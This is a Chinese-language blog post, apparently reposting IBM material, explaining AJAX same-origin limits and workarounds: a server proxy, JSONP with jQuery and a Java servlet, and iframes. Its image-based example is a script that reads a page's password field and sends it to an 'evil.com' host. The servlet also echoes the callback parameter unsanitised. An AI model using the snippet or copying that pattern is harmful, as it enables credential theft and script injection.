`
echohfut
  • 浏览: 233081 次
  • 性别: Icon_minigender_1
  • 来自: 上海
社区版块
存档分类
最新评论

AJAX Cross-Domain Same-Origin Policy limitation

    博客分类:
  • UI
阅读更多

AJAX Same-Origin Policy(SOP) limitation:

 

 

摘自:http://www.ibm.com/developerworks/library/wa-aj-jsonp1/

 

http://www.ibm.com/developerworks/cn/lotus/mashup-openajax/index.html

 

 

 

 

同源策略中“源”是一个包含主机名、协议和端口号的三元组。在同源策略的限制下,浏览器只允许网页中的脚本(如 JavaScript 或 VBScript)访问与之同源的 HTTP 请求和 cookie。注意即使域名和IP是对应的同一个地址,也是属于不同的源的。这里需要注意的是同源策略只对网页的 HTML 文档对象做了限制(XmlHttpRequest),而对静态的资源文件,如 JavaScript 文件、CSS 文件、图片都可以被导入到 HTML 文档对象中(例如 , <script src="..." >, <img src=”…”>)。因此,对于静态文件可以从任意其它域名下导入 HTML 文档。

 

 

 AJAX prevents cross-domail invokation, there are several ways to by pass this limitation.

1. write a proxy on the server side. The SOP limitation only exists only on the javascript side.  While on the side, we can still invoke the other domail url such as via HttpClient

 

 

2. JSONP(JSON with Padding)

the same-origin policy doesn't prevent the insertion of dynamic script elements (动态引入图像也是可以的,这样静态资源也可以引起跨域的调用)into the document. That is, you could dynamically insert JavaScript from different domains, carrying JSON data in them.

 

<mce:script type="text/javascript"><!--
// This is our function to be called with JSON data
function showPrice(data) {
    alert("Symbol: " + data.symbol + ", Price: " + data.price);
}
var url = “ticker.js”; // URL of the external script
// this shows dynamic script insertion
var script = document.createElement('script');
script.setAttribute('src', url);

// load the script
document.getElementsByTagName('head')[0].appendChild(script); 
// --></mce:script>

 Note that, in order to do this, you must have a callback function already defined in the Web page at the time of insertion.

Beginning with version 1.2, jQuery has had native support for JSONP calls. You can load JSON data located on another domain if you specify a JSONP callback, which can be done using the following syntax: url?callback=?.

AJAX invoke:

 

jQuery.getJSON("http://www.yourdomain.com/jsonp/ticker?symbol=IBM&callback=?", 
function(data) {
    alert("Symbol: " + data.symbol + ", Price: " + data.price);
});

 Another domain generates json data and returned to client side with callback function.

 

 

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) 
  throws ServletException, IOException {
	String jsonData = getDataAsJson(req.getParameter("symbol"));
	String output = req.getParameter("callback") + "(" + jsonData + ");";

	resp.setContentType("text/javascript");
          
	PrintWriter out = resp.getWriter();
	out.println(output);
	// prints: jsonp1232617941775({"symbol" : "IBM", "price" : "91.42"});
}

 

 

基于图像的如下:

 

(function(){ 
	function getPassword() { 
		var pw = document.getElementById("password").value; 
		var imgTag = document.createElement("IMG"); 
		imgTag.setAttribute("src", "http://evil.com?pw=" + pw); 
	} 
	document.getElementById("submit").addEventListener("click",getPassword); 
})() 

 

 

 

3. iframe

    通过iframe的src可以指向任意的server url 

分享到:
评论

相关推荐

    论文研究-Limitation of object-oriented language’s polymorphism.pdf

    面向对象编程语言中的多态性是一个关键的技术特性,它体现了面向对象编程的核心哲学,即通过不同的形式实现同一方法或操作。在多态性中,最常见的绑定方法是动态绑定或后期绑定。动态绑定允许在运行时决定调用哪个类...

    dwl-g122 b1 c1

    DWL-G122 (rev.B & rev.C) 15ML Windows Driver Release Note Setup Version: S0045 Build: 3, 3, 3, 1218 Utility: V3.40 (E) Windows 98/ME: 1.03.00.0000 (no pass WHQL) Windows 2000/XP: 1.03.00.0000 (pass ...

    Beginning Ajax

    Beginning Ajax Published by Wiley Publishing, Inc. 10475 Crosspoint Boulevard Indianapolis, IN 46256 www.wiley.com&lt;br&gt;Copyright © 2007 by Wiley Publishing, Inc., Indianapolis, Indiana...

    Skybill: traffic accounting/limitation-开源

    Skybill 是一款开源的流量统计和限制工具,主要面向小型企业设计。这个系统采用 Perl 编写,旨在帮助企业管理网络流量,实现数据的精细化和聚合分析。Skybill 的一个重要特性是它提供了 Web 前端界面,使得用户可以...

    Universal-USB-Installer

    distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend ...

    SJT11363 Limitation CN2006

    SJT11363 Limitation CN2006 国标

    DebugFactory3.zip

    5. Coverage of Warranties and Limitation of Liability -------------------------------------------------------------------------------- 1. Overview of DebugFactory for AM1 STARTER KIT --------------...

    AJAX 即时通讯例子

    AJAX 即时通讯例子 // Copyright (c) 2006 Sébastien Gruhier (http://xilinus.com, http://itseb.com) // // Permission is hereby granted, free of charge, to any person obtaining // a copy of this ...

    非常好用的批量图片水印添加的工具

    Unregistered software limitation: - no batch image watermarking (only 1 image can be loaded). To get registration code, please buy this software. Software Price: 19.95$ Purchase Link: ...

    RTL8306E-CG_Realtek.pdf

    RTL8306E-CG规格书。The RTL8306E-CG is a 6-port Fast Ethernet switch controller that integrates ...• Port-based and queue-based rate limitation • 16-entry ACL for advanced packet control application

    greenplum-db-6.2.1-rhel7-x86_64.rpm

    Note: Known Issues and Limitations describes a limitation of materialized view support in Greenplum 6.2.1. The gpinitsystem utility supports the --ignore-warnings option. The option controls the ...

    Mix-and-Match Tuning for Self-Supervised Semantic Segmentation

    In this study, we overcome this limitation by incorporating a "mix-and-match" (M&M) tuning stage in the self-supervision pipeline. The proposed approach is readily pluggable to many self-supervision ...

    IEC TS 61000-3-5-2009 Electromagnetic compatibility –Part 3-5

    IEC TS 61000-3-5-2009 Electromagnetic compatibility (EMC) –Part 3-5 Limits – Limitation of voltage fluctuations and flicker in low-voltage power supply systems for equipment with rated current ...

    flash标签云 3D效果 PHP插件 by weefselkweekje

    This is usually caused by a Flash security feature that affects movies served from another domain as the surrounding page. If your blog is http://yourblog.com, but you have ...

    NModbus_net-3.5_1.11.0.0-source

    including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to ...

    IEC 61000-3-5 (EMC) –Part 3-5

    IEC 61000-3-5 Electromagnetic compatibility (EMC) –Part 3 Limits –Section 5 Limitation of voltage fluctuations and flicker in low-voltage power supply systems for equipment with rated current ...

    Unsupervised-Attention-guided-Image-to-Image-Translation-master.zip

    Motivated by the important role of attention in human perception, we tackle this limitation by introducing unsupervised attention mechanisms which are jointly adversarially trained with the ...

    Visual-Assist-X-10.9-Build-2366.0

    Visual-Assist-X-10.9-Build-2366, 替换VA_X.dll可用. INSTALLATION 0) Uninstall VA (if you have installed it...3) PROFIT (you may see "License: trial" - don't worry, all should work without any limitation)

    Turn_Limitation_into_Strength_Design_One-Button_Games_v1_0_en

    将限制转化为优势:设计一键游戏 在移动游戏开发领域,如何克服硬件限制,尤其是小键盘和有限的游戏控制,成为了一大挑战。然而,正如诺亚·法尔斯坦(Noah Falstein)在《Game Developer》杂志中提出的“柔道法则...

Global site tag (gtag.js) - Google Analytics